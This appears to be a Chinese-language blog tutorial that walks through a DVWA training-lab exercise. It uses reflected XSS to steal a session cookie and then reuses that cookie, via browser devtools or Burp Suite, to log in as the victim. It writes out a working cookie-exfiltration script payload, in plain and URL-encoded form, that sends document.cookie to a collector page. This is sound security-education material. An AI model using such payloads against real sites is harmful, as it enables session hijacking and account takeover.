dvwa下利用xss获取cookie并利用(绕过验证)

1|0一、准备

首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录

这里就以low级别进行操作

2|0 二、获取cookie

 选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script>

 

 确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:\wamp\www(仅供参考)

 

 

 目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt

接下来需要根据题目构造js语句

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> #语句是跳转执行访问指定的文件, 并在url中显示cookie

使用js语句获取cookie的两种方式:

第一种方式:url栏输入,进行url编码

原始URL: http://location/dvwa/vulnerabilities/xss_r/?name= <script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> 需要进行URL编码: http://localhost/dvwa/vulnerabilities/xss_r/?name= %3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

第二种方式是在xss注入处直接些参数

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

 

 

 

提交,成功的话会跳转到另一个界面

 

 

 

现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本

 

 另外能够看到浏览器url框内有一个cookie的值

3|0 三、攻击者利用获取到的cookie登录到受害者的账户

第一种方式:修改浏览器记录的cookie

获取到cookie后打开另外一个浏览器访问dvwa(此浏览器用别的账号登陆过DVWA,所以浏览器有对应的cookie格式)(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值。

 修改cookie为获取的cookie 并将security 设为low ,然后输入目标用户的ID和密码登陆目标用户,

 

 

 

 

 

第二种方式:使用burpsuite 抓包,改包, 

 

 ok,已经成功利用获取到的cookie进行登录

 


__EOF__

本文作者komomon
本文链接https://www.cnblogs.com/forforever/p/12685183.html
关于博主:喜欢读书、旅行、爬山。评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   komomon  阅读(6499)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示